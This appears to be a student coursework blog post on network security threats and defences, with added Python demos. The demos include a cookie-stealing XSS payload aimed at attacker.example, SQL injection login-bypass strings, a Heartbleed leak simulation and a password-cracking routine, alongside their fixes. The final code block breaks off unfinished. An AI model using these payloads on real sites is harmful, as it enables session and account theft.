Wednesday, 22 October 2014

Network Systems Security

Task 1 (a)
Viruses & Worms
A virus is a program that can be loaded and run on your computer without the user knowing. Unlike a worm, a virus needs a carrier (host) program to spread: infected macros, games and email attachments are common carriers. Viruses are used for many different purposes, from degrading the performance of the user's computer by duplicating files and folders that consume its resources, to monitoring everything the user does in order to obtain personal information such as bank details.
A worm is similar to a virus, but it does not need a carrier program: it spreads from computer to computer on its own, typically by exploiting a vulnerability in a network service or by mailing itself out, without any action from a user. A major problem with worms is that a single infection can replicate many times over and send hundreds or even thousands of copies to everyone in the victim's address book, and the same process repeats on each recipient that opens it. Worms are one of the most effective ways to bring down an entire network, because the copies keep multiplying and the traffic they generate saturates links and servers.

Trojans & Backdoor
A Trojan looks like a piece of software that is supposed to be helpful, but once installed on a system it can cause data theft and loss, as well as system crashes or slowdowns. Trojans are often bundled with other programs or software packages. A Trojan can also create a backdoor on your computer, giving attackers remote access to the system and allowing confidential or personal information to be compromised.
A backdoor is a hidden way of bypassing the normal authentication or access controls on a user's computer, for example a listening service on an unusual port, a hard-coded account or a modified login program. Once a backdoor is in place the attacker knows how to get back into the system at will, and can use that channel to upload further tools and run them without having to break in again.

Spyware & Adware
Spyware is a program that secretly records what you are doing on your computer. Its purpose is to capture passwords, banking credentials and credit card details, which can then be used by criminals to commit fraud. Spyware resembles a Trojan in that it is usually bundled inside another program the user downloads, without the user knowing or wanting it. Spyware also takes from the user by consuming memory and processor time and by using bandwidth as it sends the captured information back to the attacker over the internet connection; because so many resources are taken up, it can also cause frequent crashes or make the system unstable.
Adware is software that automatically displays or downloads advertising material such as pop-ups or banners when a user is online. A related trick is scareware: a pop-up claims that your computer has a virus and offers a free scan, and when the user clicks to get the scan, the "scanner" they install is itself the malware.

Key logger & Rootkits
Key loggers are surveillance software that captures every key you type into your computer and saves it to a log file, which is then transferred over the network to a remote computer or web server controlled by the attacker. The attacker can then read everything you entered, including personal and confidential information such as passwords to bank accounts and email addresses. Some key loggers can also take screenshots. Key loggers are also used by employers to ensure that work computers are used for business purposes only.
A rootkit is software designed to hide the fact that a system has been compromised. Rootkits are used to hide malware, bots and worms so that the anti-virus does not pick them up, typically by hooking or patching the operating system functions that list files, processes and network connections. To install a rootkit an attacker normally needs administrator (root) privileges first, which is why rootkits usually arrive after another exploit or a Trojan has already given that level of access. Rootkits are difficult to detect because kernel-mode rootkits run with the same privileges as the operating system itself, and bootkits are activated before the operating system has completely booted, so even a good antivirus running on the compromised system may not see them; reliable detection often requires booting from clean media and inspecting the system from outside.

Impact of Operating Systems, using off the shelf software and configuration vulnerability
If there are vulnerabilities within an operating system then it will be open to attack by malicious programs. Many system administrators install operating systems with the default settings, such as leaving the default administrator account name and password in place or leaving unneeded services enabled, and then never apply security updates, so known vulnerabilities remain unpatched and exploitable.
There can be many vulnerabilities in application software, especially software downloaded from unknown websites: although it may seem legitimate, it may contain extra software that appears useful but is in fact malware designed to monitor your system or degrade its performance. Off-the-shelf software from a known vendor is much less likely to come bundled with malware, but it is not automatically safe: widely used commercial packages have publicly known vulnerabilities that attackers target precisely because so many installations exist. It must therefore be kept patched, and its installer should be checked (for example by verifying the vendor's digital signature or published checksum) rather than trusted simply because of where it was bought.

Dictionary & Brute Force Attack
A dictionary attack is a method of getting into a password-protected computer or server by systematically trying every word in a wordlist (the "dictionary") as the password. A dictionary attack can also be used to find the key needed to decrypt an encrypted message or document when that key is derived from a password. Dictionary attacks are far less successful against passwords that use multiple words, combinations of letters and numbers, and a mix of uppercase and lowercase letters, although modern cracking tools extend the wordlist with rules (appending digits, substituting characters, changing case) that recover many such passwords anyway. When that fails, a brute force attack is used, where automated software tries every possible combination of characters up to a certain length. A brute force attack will eventually succeed, but it can take a very long time to obtain the correct password, and the time grows exponentially with the password's length.

Social engineering
Social engineering refers to the psychological manipulation of people into performing actions or giving away confidential information. It is a big threat because someone may seem friendly and plausible when the conversation is really a confidence trick aimed at information gathering, system access or fraud, for example obtaining your bank details or email credentials. Social engineering is done by human interaction over the phone, by text message, by post or face to face. A typical example is someone who wants access to a network claiming that they urgently need the password to fix a major problem; the helpful employee hands it over, and the caller uses it to reach confidential data. Social engineering also includes phishing, which convinces people to divulge sensitive information such as usernames, passwords, credit card details and sometimes even money. A phishing site or message is made to look like the original, trustworthy one but is really a fake duplicate used by attackers to harvest information, and it often works because people believe they are logging in to or paying the correct website. A well-known social engineering scam is the '419' (advance-fee) scam.

Email spamming/Phishing
Email spam (also junk email) is unsolicited bulk email sent to numerous users; clicking on links in it may take users to phishing websites or to sites that host malware. To protect against spam, email filtering can be used to sort incoming mail according to criteria such as sender, subject or content. Greylisting is another defence: a mail transfer agent using greylisting temporarily rejects any email from a sender it does not recognise, and because a legitimate mail server will retry after a delay, the email is accepted once sufficient time has elapsed, while most spam software never retries. A spamtrap is a honeypot used to collect spam: it is an email address that is never used for real mail and is published only where address-harvesting bots will find it, so anything sent to it is spam by definition and its senders can be blacklisted.

Spoofing
Spoofing is falsifying the origin of an internet communication (the sender address of an email, the address or appearance of a website, the source IP address of a packet) in order to mislead users into thinking they are dealing with the real site or sender when in fact it is a lookalike fake. Spoofing is widely used to create fake emails or web pages that look real in order to steal money, passwords or banking credentials.

Task 1 (b)

Technology and impact of XSS Attack

Cross-Site Scripting (XSS) is one of the most common application-layer attacks. It occurs when a web application includes untrusted input in the pages it serves without properly encoding it, so an attacker can inject their own script, usually JavaScript, into a page that is then delivered to other users. When a victim's browser loads that page, the injected script runs with the page's origin, so it can read the victim's session cookie, make requests as the victim, alter what the page displays or redirect the user to a malicious site. Cross-site scripting attacks are therefore used to bypass access controls and to impersonate users. The two classic variants are reflected XSS, where the payload travels in a link the victim clicks (for example a search term echoed back into the results page), and stored XSS, where the payload is saved by the application (a comment or profile field) and served to every visitor.
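As an added illustration (this code is not from the original page), the following Python shows the reflected variant: a search page that echoes the query raw, the same page with proper HTML encoding, and a link builder that also checks the URL scheme. The attacker URL and the page template are constructed for the demo.

```python
import html

# Constructed attacker input: a search term carrying a script. The attacker
# host and the page template are assumptions made for this example.
XSS_PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_results_vulnerable(query: str) -> str:
    """Echoes the search term straight into the HTML. Reflected XSS: the
    browser cannot tell the attacker's <script> from the page's own markup."""
    return f"<h1>Results for: {query}</h1>"


def render_results_safe(query: str) -> str:
    """Encodes the term for an HTML text context, so < > & " ' arrive as
    entities and are displayed, never parsed as markup."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def render_link_safe(url: str, label: str) -> str:
    """Attribute context needs both quoting and a scheme check: escaping alone
    does not stop javascript: URLs, which contain no markup characters at all."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def contains_markup(rendered: str, fragment: str = "<script") -> bool:
    """Crude check used by the demo: does the rendered page still contain an
    unencoded tag start?"""
    return fragment in rendered


if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PAYLOAD))   # the script tag survives
    print(render_results_safe(XSS_PAYLOAD))         # shown as harmless text
    print(render_link_safe("javascript:alert(1)", "click"))  # href neutralised
```

The safe version encodes for the HTML text context only; a value placed inside a script block, a CSS value or a URL needs the encoding appropriate to that context, which is why templating engines that escape by default are preferred over hand-built strings.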

Technology and impact of SQL injection attack   
A SQL injection attack is a code injection technique used against data-driven applications: malicious SQL is inserted into an input field (a login form, a search box, a URL parameter) and, because the application builds its database query by concatenating that input into the SQL text, the input becomes part of the statement and is executed by the database. Injected SQL can change what a statement does, for example turning a login check into a query that always succeeds, reading tables the user should not see, or modifying and deleting data, which compromises the security of the whole web application. The standard defence is to use parameterised queries (prepared statements) so that user input is always treated as data and never as SQL.
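An added example, not from the original page, using Python's built-in sqlite3 module against a constructed in-memory table: the vulnerable login builds its query by string formatting, the safe one uses a parameterised query, and the two constructed payloads show a tautology and a comment-out attack.

```python
import sqlite3
from typing import Optional, Tuple


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table with two users. Passwords are stored in
    clear text only to keep the injection demo short; a real system stores
    a salted, slow hash and compares that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse battery", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Builds the statement by string formatting, so quotes in the input
    become part of the SQL grammar. This is the bug the section describes."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[str, str]]:
    """Parameterised query: the driver passes the values separately from the
    statement text, so they can never change its structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = build_demo_db()
    # Constructed payloads: a tautology in the password field and a comment
    # sequence in the username field that removes the password check.
    print(login_vulnerable(db, "anyone", "' OR '1'='1"))    # ('alice', 'admin')
    print(login_vulnerable(db, "alice' --", "wrong"))        # ('alice', 'admin')
    print(login_safe(db, "anyone", "' OR '1'='1"))           # None
    print(login_safe(db, "alice", "correct horse battery"))  # ('alice', 'admin')
```

With the tautology the generated WHERE clause becomes `username = 'anyone' AND password = '' OR '1'='1'`, which is true for every row, so the first user in the table (here the administrator) is "logged in". The parameterised version receives the same strings but compares them as literal values.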

DoS Attack, DDoS Attack and spoofing
A DoS (denial of service) attack is when an attacker attempts to prevent legitimate users from accessing information or services by targeting a computer or network, so that users cannot reach, for example, their email or an online service such as a bank account. The most common form is a flood: the attacker sends so much traffic or so many requests that the server, which can only process a certain number at once, has no capacity left for genuine users.
A DoS attack can have a huge impact on an organisation. It can stop staff from doing any work by cutting them off from important services such as their email or the website that holds the information they need. The result is lost money and reduced or zero productivity, and it can damage the organisation's reputation if staff cannot work and customers cannot get the service they expect.
A DDoS (distributed denial of service) attack overwhelms the target with hundreds of thousands of requests sent from many machines at once. To generate that volume the attacker usually uses a botnet of compromised computers, which also makes the attacker hard to trace and the traffic less suspicious because it comes from many sources rather than one. That makes it impossible to stop the attack simply by blocking a single IP address, and very difficult to distinguish legitimate traffic from attack traffic when it is spread across so many points of origin.
Spoofing can be used to make a DDoS attack more effective: the attacker sends requests to a third party's servers with the source address forged to be the victim's, so that all of the third party's replies go to the victim (a reflection attack). The victim sees traffic arriving from what look like legitimate, often trusted, servers, and cannot block it without also blocking them. Spoofing also covers the attacker's tracks, since the attacker never sends packets to the victim directly and the traffic cannot easily be traced back.

Google Hacking technique
Google hacking is a technique that uses Google's advanced search operators (such as site:, filetype: and inurl:) to find security weaknesses in the configuration and code that websites use. For example, if an organisation leaves a file containing staff usernames and passwords in a web-accessible directory and does nothing to stop search engines from reading it, Google's crawler may index it, and anyone who types the right query will find the document with the usernames and passwords of everyone working there. That is a massive security breach, because attackers can then use those accounts and cause serious problems for the organisation. A robots.txt file listing the pages that crawlers should not index is the usual suggestion for protecting against this, but it is not a security control: it is only a request that well-behaved crawlers honour, and it advertises the very paths it lists. Sensitive material should not be reachable from the web at all, and anything that must be should sit behind authentication; administrators should also run the same searches against their own domain to see what has already been indexed.

Task 1 (c)
The Heartbleed Bug
The Heartbleed bug (CVE-2014-0160) was a serious vulnerability in the popular OpenSSL cryptographic library, disclosed in April 2014, that affected a huge number of major websites. It was a missing bounds check in OpenSSL's implementation of the TLS heartbeat extension, present in OpenSSL 1.0.1 through 1.0.1f: a client sends a heartbeat request containing a payload and a field stating how long the payload is, and the server is supposed to echo that payload back. The vulnerable code trusted the stated length without comparing it to the actual size of the request, so a request claiming a payload of up to 64 KB but carrying only a few bytes made the server copy up to 64 KB of whatever followed in its memory into the reply. Because that memory belonged to the process terminating SSL/TLS, it could contain private keys, session cookies, usernames and passwords and other data that the encryption was supposed to protect, and the attack left no trace in logs. The bug therefore allowed anyone on the internet to read the memory of systems running vulnerable OpenSSL versions, and an attacker who recovered the private key could impersonate the service and decrypt recorded traffic.
Affected major sites included Facebook, Instagram, Tumblr, Google search, Gmail, Yahoo and Yahoo Mail, Netflix, YouTube, Amazon Web Services and Dropbox. No sophisticated technique was needed: anyone able to open a TLS connection to a vulnerable server could send malformed heartbeat requests repeatedly and harvest memory, and public scanning and exploitation scripts appeared within hours of the announcement.
The fix was a new OpenSSL release, 1.0.1g, which adds the missing length check and silently discards malformed heartbeats. Operating system vendors and distributions, appliance vendors and independent software vendors had to ship the fix and notify their users, who had to install it. Because the private key may already have been read from memory, patching alone was not enough: affected sites also had to generate new keys, reissue their certificates and revoke the old ones, and advise users to change their passwords once the patch was in place.
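To make the missing check concrete, here is an added simulation in Python (not OpenSSL's code, and not from the original page): the heartbeat message layout is the real one, but process memory is modelled as a bytearray with a constructed secret placed after the received record, and the bounds check is the one the fixed release added.

```python
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # a TLS heartbeat message carries at least 16 bytes of padding


def build_heartbeat_request(claimed_payload_len: int, payload: bytes) -> bytes:
    """type(1) | payload_length(2, big-endian) | payload | padding.
    The length field is attacker-controlled and need not match the payload."""
    return (bytes([HB_REQUEST]) + struct.pack("!H", claimed_payload_len)
            + payload + b"\x00" * PADDING)


def handle_heartbeat(heap: bytearray, record_len: int, check_bounds: bool) -> Optional[bytes]:
    """Models the server's heartbeat handler. `heap` stands in for process
    memory: the received record occupies heap[0:record_len] and whatever the
    process had allocated nearby follows it. With check_bounds=False the
    handler trusts the length field (the Heartbleed bug); with
    check_bounds=True it applies the fix and drops malformed requests."""
    if heap[0] != HB_REQUEST:
        return None
    payload_len = struct.unpack("!H", bytes(heap[1:3]))[0]
    if check_bounds and 1 + 2 + payload_len + PADDING > record_len:
        return None  # silently discard, as the patched code does
    # The vulnerable memcpy: copies payload_len bytes starting at the payload,
    # regardless of where the received record actually ends.
    echoed = bytes(heap[3:3 + payload_len])
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_len)
            + echoed + b"\x00" * PADDING)


def simulate(claimed_len: int, check_bounds: bool) -> Optional[bytes]:
    """Constructed scenario: a 2-byte payload, followed in memory by unrelated
    data and then a secret. Returns the echoed payload, or None if rejected."""
    request = build_heartbeat_request(claimed_len, b"hi")
    secret = b"Cookie: session=deadbeef; user=alice"   # constructed, not real
    heap = bytearray(request + b"\x00" * 40 + secret)
    response = handle_heartbeat(heap, len(request), check_bounds)
    if response is None:
        return None
    return response[3:3 + claimed_len]


if __name__ == "__main__":
    print(simulate(2, False))     # b'hi': an honest request is answered normally
    print(simulate(200, False))   # leaks the bytes after the record, secret included
    print(simulate(200, True))    # None: the malformed request is dropped
```

A real attacker repeats the over-length request thousands of times; each reply is a fresh 64 KB window into whatever the server happened to have in memory at that moment.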
eBay data breach
The 2014 breach affected up to 145 million eBay customers, and everyone was asked to change their password to secure their account. The breach came from attackers compromising a small number of employee log-in credentials, which gave them access to eBay's corporate network and from there to a database of customers' personal data. A breach like this damages the reputation of a major buyer/seller company: although eBay stated that financial information was stored separately and was not accessed, the attackers could still see customers' names, home addresses, email addresses, dates of birth and encrypted passwords. eBay responded by emailing all users asking them to change their passwords, so that anyone holding the stolen credentials could no longer use them, and warned that a genuine eBay email would contain no external link to a reset page, so any such email should be treated as phishing. To limit the damage of future breaches, users should use complex, unique passwords that differ from those on any other account, so that a password exposed in one breach cannot be reused elsewhere.
Task 2 (a)
Different features to secure email
Hoax Email
Hoax emails, also known as spoof emails, are falsified messages in which the sender alters parts of the email to make it look as though it was sent or authorised by someone else: the sender's name and address and the body of the message may all appear to come from a legitimate source such as a bank, a newspaper or a well-known company.

S/MIME to protect hoax email
Secure/Multipurpose Internet Mail Extensions (S/MIME) provides a consistent way to send and receive MIME data securely. S/MIME adds cryptographic security services to electronic messaging: authentication and message integrity through digital signatures, and data confidentiality through encryption. A mail client can use it to sign and encrypt the mail it sends and to verify signatures and decrypt the mail it receives. Against hoax email the digital signature is what matters: a forged message will either carry no signature or carry one that fails to verify against the claimed sender's certificate, so the recipient can tell it apart from a genuine message. S/MIME can also be used with any transport mechanism that carries MIME data, such as HTTP.
Other things can be done to limit the damage from hoaxing: generate alerts when forged mail is detected; develop and implement a company email use policy; use a single point of entry for email into your site so that mail is much easier to monitor; configure your mail server so that it is not an open relay, that is, so that outsiders cannot connect to your SMTP port and send spoofed email to other sites through it; and remember that although the headers of an email often record its complete route, those headers can be spoofed too, so only the headers added by your own servers can be trusted.

Spam guard
A spam guard stops spam from flooding a server by matching patterns within incoming emails and by consulting blacklists of known spam sources. It reduces the amount of spam that reaches your inbox by diverting most of it to the junk mail folder, and you can add filters that sort email by sender, subject or body text. A spamtrap honeypot, a fake email address published only where address-harvesting bots will find it, can be used to attract spammers: anything sent to it is spam, so the spam guard adds its senders to the blacklist. Greylisting temporarily rejects email from senders it does not recognise and accepts it only when the sending server retries after a delay, which most spam software does not do.
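Added example, not from the original page: a minimal greylisting decision function in Python. The delay values, the SMTP reply texts and the delivery attempts are constructed for the demo; a production implementation would also persist the table, whitelist known-good senders and expire old entries on a schedule.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

TEMPFAIL = "451 4.7.1 Greylisted, please try again later"
ACCEPT = "250 OK"

Triplet = Tuple[str, str, str]  # (client IP, envelope sender, envelope recipient)


@dataclass
class Greylist:
    """Tracks first-seen times per triplet. The delay and expiry values are
    assumed policy for this example, not figures from the original page."""
    min_delay: int = 300            # seconds a retry must wait before acceptance
    expire_unseen: int = 4 * 3600   # forget a triplet that never retried within this
    first_seen: Dict[Triplet, int] = field(default_factory=dict)
    known: Set[Triplet] = field(default_factory=set)  # triplets that passed once

    def check(self, client_ip: str, sender: str, recipient: str, now: int) -> str:
        key = (client_ip, sender.lower(), recipient.lower())
        if key in self.known:
            return ACCEPT                       # auto-whitelisted after first success
        first = self.first_seen.get(key)
        if first is None or now - first > self.expire_unseen:
            self.first_seen[key] = now          # new or stale: start the clock
            return TEMPFAIL
        if now - first < self.min_delay:
            return TEMPFAIL                     # retried too quickly, still greylisted
        self.known.add(key)
        del self.first_seen[key]
        return ACCEPT


def run_scenario() -> List[str]:
    """Constructed delivery attempts (time in seconds, client, sender, recipient):
    a real MTA retrying after its queue delay, and a spam bot that fires once
    and never comes back."""
    gl = Greylist()
    attempts = [
        (0,   "192.0.2.10",   "newsletter@example.org", "me@example.com"),
        (60,  "192.0.2.10",   "newsletter@example.org", "me@example.com"),
        (420, "192.0.2.10",   "newsletter@example.org", "me@example.com"),
        (500, "192.0.2.10",   "newsletter@example.org", "me@example.com"),
        (0,   "198.51.100.7", "offer@spam.example",     "me@example.com"),
    ]
    return [gl.check(ip, s, r, t) for t, ip, s, r in attempts]


if __name__ == "__main__":
    for code in run_scenario():
        print(code)
```

Expected sequence: the newsletter is deferred at 0 s and 60 s, accepted at 420 s once the minimum delay has passed, accepted immediately thereafter, and the one-shot spam attempt is deferred and never delivered. The cost is a delay on the first message from any new sender, which is why legitimate senders are usually whitelisted after they pass once.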

Wireless networked security/Networked devices security
There are several ways to secure a wireless network against attackers and other unauthorised users. Use WPA2 encryption with a strong passphrase, so that anyone connecting must know a secret that only authorised users have (the older WEP scheme is broken and can be cracked in minutes, so it should not be used). Change the network name (SSID) from the default: a default name such as BTWIFI-JW7843 tells an attacker the ISP and often the router model, which lets them look up default credentials and known weaknesses for that device, so the name should be changed to something that reveals nothing useful. Another big problem is rogue access points, or "evil twins": an attacker outside the organisation can set up an access point with a strong signal and a plausible name such as "Halifax free Wi-Fi", and users will connect to it because it is free and looks trusted, after which the attacker can intercept their traffic or attack their devices. To counter this, organisations should regularly survey the Wi-Fi in and around their premises to make sure there are no untrusted access points for users to connect to. Registering the MAC addresses of authorised devices on the access point, so that unregistered devices cannot join, adds a further hurdle, but only a minor one: MAC addresses can be seen by anyone sniffing the wireless traffic and are trivial to change, so MAC filtering should be used alongside encryption, never instead of it.

Use of transmission media
UTP (unshielded twisted pair) cable is a popular type of cable consisting of pairs of unshielded wires twisted around each other; a standard Ethernet cable contains four such pairs (eight wires). UTP is low cost, so it is widely used for local-area networks (LANs) and telephone connections. UTP does not offer as much bandwidth or as good protection from interference as coaxial or fibre optic cable; the twisting of each pair is what reduces electromagnetic interference (EMI) and crosstalk between pairs.
STP (shielded twisted pair) cable has a conducting shield around the twisted pairs which blocks electromagnetic interference, allowing the cable to carry data reliably in electrically noisy environments. Shielded cable is more expensive than unshielded but gives much better protection against EMI.
So using shielded rather than unshielded cable is safer in the sense that the signal will not be disrupted by electrical interference, but it costs a lot more. Shielded cable is not always necessary: it is mainly used by larger companies or in places such as factories with large electrical equipment, whereas a small office will mainly use unshielded cable because it is cheap and does the job. From a security rather than a reliability standpoint, copper of either kind can be tapped and radiates a signal that can be picked up nearby, whereas fibre optic cable does not radiate and is much harder to tap without noticeably affecting the link, which is why fibre is preferred for runs that cross areas outside the organisation's control.

Access Control
There are three factors of authentication used in access control: something you know (a password, PIN and so on), something you have (an ID card, smart card or token) and something you are (biometrics such as a fingerprint or retina scan); combining two of them gives much stronger assurance than any one alone. Access control is a way of limiting access to a system or to physical or virtual resources. In computing, access control is used to grant users access, and specific privileges, to systems, resources or information; in organisations this is mostly done by giving staff access to certain data based on their job role. Access control is used heavily for security so that unauthorised users cannot reach protected information or places. A key card may be used to allow access to a certain area in a company, a fingerprint scan to unlock a personal phone, or a password to access a personal computer or server.

Secure Password
Having a secure password is very important, as it is what keeps attackers from accessing our personal and confidential data. Passwords can be obtained in different ways, from simple guessing to dictionary-based attacks and phishing. Never use a password that others could easily guess, such as the name of a family member, friend, favourite place or pet, because people who know you can try those first. One recommended way to create a more secure yet memorable password is to follow a repeatable pattern, so that the password can be recreated when needed. These are the steps to follow in creating such a password:

  • Start with a memorable phrase such as usesecurepasswords
  • Change every other letter to uppercase, starting with the first, resulting in UsEsEcUrEpAsSwOrDs
  • Change every "a" to "@" and every "s" to "5" to yield U5E5EcUrEp@55wOrD5
  • Split the result into pairs of characters and drop every other pair (keeping the first, third, fifth and so on) to give U5EcEp5wD5
Following these steps gives a password that meets typical complexity requirements and can be recreated if it is forgotten. One caveat: alternating case and substituting @ for a and 5 for s are exactly the kind of rules that password-cracking tools apply automatically to every word in their lists, so the scheme only adds real strength if the starting phrase is itself not in any wordlist. A long passphrase of several unrelated words, or a random password kept in a password manager, is stronger than a mangled single phrase, and no password should be reused across sites.
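The following Python is an added example (not from the original page) that implements the four steps as functions and then shows the weakness described: a dictionary attack that applies the same steps to each candidate phrase recovers the password as soon as the starting phrase is in its wordlist. The wordlist and the use of SHA-256 are assumptions for the demo.

```python
import hashlib
from typing import Iterable, Optional

LEET = {"a": "@", "s": "5"}  # the substitutions used in step 3


def alternate_case(s: str) -> str:
    """Step 2: upper-case every other letter, starting with the first."""
    return "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(s))


def leet(s: str) -> str:
    """Step 3: replace a/A with @ and s/S with 5."""
    return "".join(LEET.get(c.lower(), c) for c in s)


def drop_every_other_pair(s: str) -> str:
    """Step 4: split into two-character pairs and keep the 1st, 3rd, 5th..."""
    pairs = [s[i:i + 2] for i in range(0, len(s), 2)]
    return "".join(p for i, p in enumerate(pairs) if i % 2 == 0)


def mangle(phrase: str) -> str:
    """The whole pattern, as the user would apply it."""
    return drop_every_other_pair(leet(alternate_case(phrase)))


def sha256_hex(s: str) -> str:
    """Stand-in for a stolen password hash. Real stores use a slow, salted
    hash; that raises the cost per guess but does not change the principle."""
    return hashlib.sha256(s.encode()).hexdigest()


def crack(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack with the same rule applied to every candidate."""
    for phrase in wordlist:
        candidate = mangle(phrase)
        if sha256_hex(candidate) == target_hash:
            return candidate
    return None


if __name__ == "__main__":
    pw = mangle("usesecurepasswords")
    print(pw)  # U5EcEp5wD5
    stolen = sha256_hex(pw)
    # Constructed wordlist: a few memorable phrases of the kind people pick.
    print(crack(stolen, ["letmein", "iloveyou", "usesecurepasswords", "opensesame"]))
```

The attacker does not need to know the victim's exact recipe in advance: cracking tools ship with thousands of such rules and try all of them against every word, so any fixed transformation of a common phrase is cheap to recover.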

Intrusion Detection System (IDS)
An intrusion detection system is used to detect unauthorised activity and alert the responsible person or team so that they can respond. An IDS gathers and analyses information from various areas within a computer or network to identify possible security breaches. It checks inbound and outbound network activity, or activity on a host, and identifies suspicious patterns that may indicate someone attempting to compromise a system.

Intrusion Prevention System (IPS)
An IPS (intrusion prevention system) sits inline in the traffic path and combines the detection of an IDS with the ability to enforce policies and rules on network traffic. Like an IDS it alerts administrators to potentially harmful traffic, but it can also act on its own: it examines incoming packets and, if a packet matches a known attack or violates policy, drops it or resets the connection before it reaches the target, so the administrator does not have to respond manually to every alert. The trade-off is that a false positive in an IPS blocks legitimate traffic rather than merely raising an alarm.

Use of encryption
Encryption is the process of encoding messages or information so that they can be understood only by authorised users who hold the key. Some algorithms and modes provide higher levels of protection than others, so the more sensitive the data, the stronger the encryption that should be used. Encryption is also used on websites (HTTPS), in wireless networking security (WPA2) and for remote access (VPNs, SSH) to prevent eavesdropping and spoofing.

Task 2 (b)
Active & Passive IDS
In a passive system the IDS detects a potential security breach, logs the information and signals an alert to the administrator or user, and it is up to them to block the activity or respond in some other way. In an active (reactive) system the IDS responds to the suspicious activity itself, for example by logging off a user or by reprogramming the firewall to block network traffic from the suspected malicious source. So where a passive IDS requires a person to act on the alert, an active IDS deals with the suspicious activity without user input, at the risk that a false positive blocks legitimate traffic.

Networked and Host IDS
In a network-based system (NIDS) the individual packets flowing through the network are analysed, so a NIDS can detect malicious packets that are designed to slip past a firewall's simple filtering rules. In a host-based system (HIDS) the IDS examines the activity on each individual computer or host, such as log files, process activity and changes to critical files. A network-based IDS is the better choice when the goal is to protect the whole network, whereas a host-based IDS is usually all that is needed for a home network or a single server. Although a NIDS gives broader coverage, a HIDS uses far fewer resources and can see things a NIDS cannot, such as the contents of encrypted traffic once the host has decrypted it.

Knowledge Based and Behaviour Based IDS
Many IDS tools are knowledge-based (also called signature-based). Knowledge-based intrusion detection applies accumulated knowledge about specific attacks and system vulnerabilities: the IDS holds signatures describing the vulnerabilities and the traffic or activity that exploits them, and looks for matches. When an attempt is detected an alarm is raised to warn the administrator. Knowledge-based IDS has clear advantages: the false alarm rate is very low and the contextual analysis it provides is very detailed, which makes it easier for the people running it to prevent or correct the problem. The cost is that a knowledge-based IDS can only detect attacks it already knows about, and maintaining it requires careful analysis of each new vulnerability and a signature update, which takes a lot of time.

Behaviour-based (anomaly-based) IDS techniques assume that an intrusion can be detected by observing a deviation from the normal or expected behaviour of the system or its users. A model of normal behaviour is learned from reference information (for example the usual request rate per client, the usual processes on a host, or the usual working hours), and the IDS compares current activity with that model. When an irregularity is observed an alarm is generated. Behaviour-based IDS has advantages of its own: it can detect attempts to exploit new and unforeseen vulnerabilities, and it can help detect "abuse of privilege" attacks that do not involve exploiting any vulnerability at all. Its drawbacks are a high false alarm rate, since legitimate but unusual activity also looks anomalous, and the fact that the system may be under attack during the period in which the IDS is learning what "normal" looks like, so that the attack becomes part of the baseline.
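Added example, not from the original page, showing both approaches in Python over constructed web-server log lines: signature rules catch one injected request that is unremarkable by volume, and a per-client request-rate baseline catches a 40-request login flood that matches no signature. The log format, the rules and the threshold formula are assumptions for the demo.

```python
import re
import statistics
from collections import Counter
from typing import List, Tuple
from urllib.parse import unquote

# Knowledge-based rules: patterns of known attacks in the (decoded) request path.
SIGNATURES = {
    "sqli": re.compile(r"(?i)(union\s+select|'\s*or\s+'1'\s*=\s*'1|--\s*$)"),
    "xss": re.compile(r"(?i)(<script|javascript:)"),
    "traversal": re.compile(r"\.\./"),
}

# Constructed log format: "ip time method path status".
LINE = re.compile(r"(\S+) (\S+) (GET|POST) (\S+) (\d{3})")


def parse(line: str) -> Tuple[str, str, str, str]:
    """Returns (ip, time, URL-decoded path, status) for one log line."""
    m = LINE.match(line)
    if not m:
        raise ValueError("unparseable log line: " + line)
    ip, ts, _method, path, status = m.groups()
    return ip, ts, unquote(path), status


def signature_alerts(lines: List[str]) -> List[Tuple[str, str]]:
    """Knowledge-based detection: flag any request matching a known pattern."""
    alerts = []
    for line in lines:
        ip, _, path, _ = parse(line)
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                alerts.append((ip, name))
    return alerts


def build_baseline(lines: List[str]) -> float:
    """Behaviour-based detection, learning phase: requests per client during a
    window of known-clean traffic, summarised as mean + 3 standard deviations."""
    values = list(Counter(parse(l)[0] for l in lines).values())
    return statistics.mean(values) + 3 * statistics.pstdev(values)


def anomaly_alerts(lines: List[str], threshold: float) -> List[str]:
    """Behaviour-based detection: any client whose request count in the window
    exceeds the learned threshold, whatever the requests contain."""
    counts = Counter(parse(l)[0] for l in lines)
    return [ip for ip, n in counts.items() if n > threshold]


# Constructed training window: four clients making 3 to 5 requests each.
TRAINING = [
    f"10.0.0.{h} 09:0{i}:00 GET /index.html 200"
    for h, n in ((2, 3), (3, 4), (4, 5), (5, 4)) for i in range(n)
]

# Constructed detection window: normal browsing, one SQL injection attempt,
# and a 40-request password-guessing burst against /login.
DETECTION = (
    [f"10.0.0.{h} 10:0{i}:00 GET /products 200" for h in (2, 3) for i in range(3)]
    + ["10.0.0.7 10:01:30 GET /search?q=%27%20OR%20%271%27%3D%271 200"]
    + [f"10.0.0.9 10:02:{i:02d} POST /login 401" for i in range(40)]
)

if __name__ == "__main__":
    threshold = build_baseline(TRAINING)
    print("signature alerts:", signature_alerts(DETECTION))   # [('10.0.0.7', 'sqli')]
    print("rate threshold:", round(threshold, 2))
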